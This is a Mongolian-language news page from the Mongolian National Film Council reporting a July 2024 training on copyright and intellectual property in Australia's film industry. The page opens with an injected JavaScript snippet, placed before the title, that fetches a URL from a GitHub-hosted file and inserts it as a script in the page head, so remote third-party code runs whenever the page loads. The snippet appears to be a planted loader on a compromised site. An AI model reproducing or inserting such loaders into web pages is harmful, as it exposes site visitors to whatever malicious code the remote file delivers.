;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ОЮУНЫ ӨМЧИЙН ЭРХ БОЛОН ЗОХИОГЧИЙН ЭРХИЙН АВСТРАЛИ УЛСЫН КИНО УРЛАГИЙН САЛБАРЫН ТУРШЛАГА СУРГАЛТЫГ ЗОХИОН БАЙГУУЛЛАА - Mongolian National Film Council
ОЮУНЫ ӨМЧИЙН ЭРХ БОЛОН ЗОХИОГЧИЙН ЭРХИЙН АВСТРАЛИ УЛСЫН КИНО УРЛАГИЙН САЛБАРЫН ТУРШЛАГА СУРГАЛТЫГ ЗОХИОН БАЙГУУЛЛАА
Соёлын яамны харьяа Кино урлагийн зөвлөл нь Австралийн тэтгэлэгт хөтөлбөрийг Австралийн Засгийн газрын нэрийн өмнөөс хариуцагч Австралиа Авардс Монгол компанитай хамтран “АВСТРАЛИ УЛСЫН КИНО УРЛАГИЙН САЛБАРЫН ТУРШЛАГА” Оюуны өмчийн эрх болон Зохиогчийн эрхийн талаарх сургалтыг 2024 оны 07 дугаар сарын 01-ний өдөр зохион байгууллаа.
Монгол Улсын кино урлагийн салбарт тулгарч буй оюуны өмч, зохиогчийн эрхийн асуудлыг тус сургалтаар дамжуулан Австрали улсад энэхүү асуудлыг хэрхэн шийдвэрлэж уран бүтээлчдийн бүтээлийн эрх, оюуны өмчийг хэрхэн хамгаалж, цогц системийг бий болгосон талаарх туршлага, мэдээллийг солилцов. Мөн Хамтын удирдлагын байгууллагын тогтолцоог оновчтой системээр зохион байгуулж, зохиогч, зохиогчийн эрх эзэмшигч болон түүнд хамаарах эрх эзэмшигчид бүтээл ашиглах онцгой эрхийг хэрэгжүүлэх болон хамгаалах талаар туршлага хуваалцсан үр дүнтэй сургалт болж өндөрлөлөө.
Энэхүү сургалтад Соёлын яам, Засгийн газрын хэрэгжүүлэгч агентлаг Оюуны өмчийн газар, Харилцаа холбооны зохицуулах хороо, Соёл урлагийн газар болон Кино урлагийн салбарын уран бүтээлчдийн төлөөлөл нийт 35 хүн хамрагдсан бөгөөд Кино урлагийн зөвлөлийн гишүүд болон Кино урлагийн зөвлөлийн ажлын албаны төлөөлөл мөн оролцож туршлага солилцов.
Сургалтын ерөнхий агуулга:
• Зохиогчийн эрхийн гол асуудлууд болон оюуны өмчийн бодлого
• Зохиогчийн эрхийн болон оюуны өмчийн талаарх олон талт ойлголтыг танилцуулах
• Зохиогчийн эрхийн тогтолцоог танилцуулах
• Зохиогчийн эрх болон оюуны өмчийн хоорондын харилцан хамаарал, зөрчлийг тодорхойлох
Илтгэгч талууд:
– Австрали болон Шинэ зеландын дэлгэцийн нийгэмлэг
– “Screenrights” зохиогчийн эрхийн байгууллага
– Австралийн продюсерийн холбоо
– Австралийн найруулагчдын холбоо
– Австралийн зохиолчдын холбоо
– Медиа, энтертайнмент урлагийн холбоо